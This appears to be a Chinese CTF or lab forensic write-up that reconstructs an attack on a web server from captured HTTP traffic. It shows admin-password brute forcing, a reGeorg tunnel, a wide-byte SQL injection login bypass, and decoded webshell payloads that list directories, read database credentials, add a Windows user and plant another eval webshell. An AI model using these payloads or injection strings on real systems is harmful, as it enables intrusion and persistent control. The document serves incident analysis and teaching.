username=admin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=apple&lang=&option=com_login&task=login&return=aW5kZXgucGhw&f2426d9ea34e95fe916e6309d7028835=1
username=admin&passwd=apple&option=com_login&task=login&return=aW5kZXgucGhw&2bb30f381fad54b0ca7f4088e7e9cc97=1

可以看到攻擊者在之前對管理員密碼進(jìn)行了爆破
最后出現(xiàn)了兩個相同的賬號密碼為 admin/apple
猜測極有可能是正確的密碼
對比一下之前和最后的相應(yīng)包

image.png

嘗試一個錯誤密碼的時候 , 返回了 303 See Other , 并重定向到了 /administrator/index.php
在 index.php 內(nèi)容中也可以找到 :

image.png

<p class="alert-message">Username and password do not match or you do not have an account yet.</p>

而在真正登錄成功的時候 , 雖然也是返回 303 , 重定向到 /administrator/index.php
但是可以發(fā)現(xiàn) , index.php 的內(nèi)容是明顯不同的

image.png

攻擊者經(jīng)過爆破密碼得到了管理員的密碼 admin/apple

到這里 Jshell 的分析應(yīng)該差不多了

接下來看一下攻擊者上傳如何上傳 Bshell
Bshell 是存在于內(nèi)網(wǎng)的 , 攻擊者通過 reGeord 進(jìn)行內(nèi)網(wǎng)滲透 , 跳板文件名為 tunnel.php
這里存在一個小技巧
tunnel.php 在實(shí)現(xiàn)的時候 , 每一個獨(dú)立的 TCP 連接會由同一個 Session 維護(hù)
所以可以根據(jù) PHPSESSID 來跟蹤一個發(fā)向內(nèi)網(wǎng)的 HTTP 請求
發(fā)起一個新的鏈接的 URL 會是這樣 ?cmd=connect&target=8.8.8.8&port=8888
發(fā)送數(shù)據(jù)會是這樣 ?cmd=forward
讀取數(shù)據(jù) : ?cmd=read
斷開連接 : ?cmd=disconnect

image.png

在這里進(jìn)行了登錄

image.png

admin_name=simple%d5%27%20or%201%3d1%23&admin_pwd=simple&submit=%B5%C7%C2%BC&act=do_login
// 這里直接使用了寬字節(jié)注入成功登錄

image.png

然后使用模板編輯器 /admin/tpl_manage.php 對 ../data/config.php 進(jìn)行了編輯

image.png

這里攻擊者已經(jīng)創(chuàng)建了 webshell , 接下來分析攻擊者是如何利用 webshell 的

grep -o 'Bshell.*' http.txt > Bshell

with open("Bshell") as f:
    for line in f:
        import urllib
        print "-" * 32
        data = ("Bshell=@eval(ba" + urllib.unquote(line)[16:-1])
        print data
        data = data.split("&")
        for i in data[1:]:
            d = i.split("=")
            key = d[0]
            value = ("".join("%s=" % (i) for i in d[1:]))[0:-1]
            try:
                print "%s=%s" % (key, value.decode("base64"))
            except:
                print "%s=%s" % (key, (value + (4 - len(d[1]) % 4) * "=").decode("base64"))

Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// 獲取目標(biāo)服務(wù)器系統(tǒng)信息, 用戶名
->|C:/phpstudy/WWW/bluecms/data C:D:    Windows NT OA-43EAD51FB6C5 5.1 build 2600 (Windows XP Professional Service Pack 3) i586(Administrator)|<-

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// 獲取目標(biāo)服務(wù)器 C:\\ 目錄的所有文件
addons/  2017-08-29 03:38:21 0   0777
Documents and Settings/ 2017-09-06 03:58:45 0   0777
phpstudy/   2017-09-06 03:39:12 0   0777
Program Files/  2017-09-06 03:53:46 0   0555
RECYCLER/   2017-08-29 03:37:07 0   0777
System Volume Information/  2017-07-24 03:56:23 0   0777
WINDOWS/    2017-08-28 06:55:01 0   0777
AUTOEXEC.BAT    2017-07-24 03:54:32 0   0777
boot.ini    2017-07-24 03:52:40 211 0666
bootfont.bin    2008-04-14 12:00:00 322730  0444
CONFIG.SYS  2017-07-24 03:54:32 0   0666
IO.SYS  2017-07-24 03:54:32 0   0444
MSDOS.SYS   2017-07-24 03:54:32 0   0444
NTDETECT.COM    2008-04-14 12:00:00 47564   0555
ntldr   2008-04-14 12:00:00 257728  0444
pagefile.sys    2017-09-07 11:47:21 805306368   0666

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// 獲取目標(biāo)服務(wù)器 C:\\ 目錄的所有文件

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// 執(zhí)行系統(tǒng)命令 net user bluehacker redhacker1@3 /add

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// 執(zhí)行系統(tǒng)命令 net user bluehacker redhacker1@3 /add

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 獲取目標(biāo)服務(wù)器 C:\\phpstu 目錄的所有文件
->|./   2017-09-07 08:26:56 0   0777       
../ 2017-09-06 03:39:12 0   0777           
bluecms/    2017-09-07 08:27:01 0   0777   
metinfo/    2017-09-07 07:05:58 0   0777   
phpMyAdmin/ 2017-09-06 03:38:48 0   0777   
l.php   2014-02-27 15:02:21 21201   0666   
phpinfo.php 2013-05-09 12:56:36 23  0666   
|<-                                        


--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 獲取目標(biāo)服務(wù)器 C:\\phpstu 目錄的所有文件

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\
// 獲取目標(biāo)服務(wù)器 C:\\phpstudy\\WWW\\ 目錄的所有文件
->|./   2017-09-07 08:27:01 0   0777                   
../ 2017-09-07 08:26:56 0   0777
admin/  2017-09-07 08:27:02 0   0777
api/    2017-09-07 08:27:01 0   0777
data/   2017-09-07 08:33:05 0   0777
images/ 2017-09-07 08:27:01 0   0777
include/    2017-09-07 08:26:59 0   0777
install/    2017-09-07 08:26:57 0   0777
js/ 2017-09-07 08:26:57 0   0777
templates/  2017-09-07 08:26:56 0   0777
uc_client/  2017-09-07 08:26:56 0   0777
ad_js.php   2010-02-08 13:40:00 869 0666
ann.php 2010-02-08 13:39:54 2478    0666
category.php    2010-02-08 13:47:48 8821    0666
comment.php 2010-02-08 13:39:40 3531    0666
guest_book.php  2010-02-08 13:51:28 2538    0666
index.php   2010-02-08 13:40:08 7471    0666
info.php    2010-02-08 13:50:02 4527    0666
info_index.php  2010-02-08 13:50:50 1869    0666
news.php    2010-01-07 10:02:34 3477    0666
news_cat.php    2010-02-08 13:54:52 2069    0666
publish.php 2010-02-09 03:40:36 9185    0666
robots.txt  2009-12-01


--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\
// 獲取目標(biāo)服務(wù)器 C:\\phpstudy\\WWW\\bluecms\\ 目錄的所有文件
->|./   2017-09-07 08:33:05 0   0777                
../ 2017-09-07 08:27:01 0   0777
admin/  2017-09-07 08:27:01 0   0777
backup/ 2017-09-07 08:27:01 0   0777
cache/  2017-09-07 08:27:01 0   0777
compile/    2017-09-08 02:30:03 0   0777
upload/ 2017-09-07 08:27:01 0   0777
bannedip.cache.php  2017-09-08 09:24:52 25  0666
config.cache.php    2017-09-07 08:33:05 550 0666
config.php  2017-09-08 09:27:58 276 0666
index.htm   2009-10-02 12:46:24 894 0666
update_log.txt  2017-09-07 08:42:58 8   0666

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// 獲取目標(biāo)服務(wù)器 C:\\phpstu 目錄的所有文件

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGNvbmZpZy5waHA=
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\config.php
// 獲取 C:\\phpstudy\\WWW\\bluecms\\data\\config.php 文件內(nèi)容
->|<?php                            
$dbhost   = "localhost";                                    
$dbname   = "bluecms";                      
$dbuser   = "root";                 
$dbpass   = "123456";               
$pre    = "blue_";                  
$cookiedomain = '';                  
$cookiepath = '/';                  
@eval($_POST['Bshell']);            
define('BLUE_CHARSET','gb2312');                        
define('BLUE_VERSION','v1.6');                            
?>|<-                               

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// 將 <?php eval($_POST['cmd_shell']);?> 寫入 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php

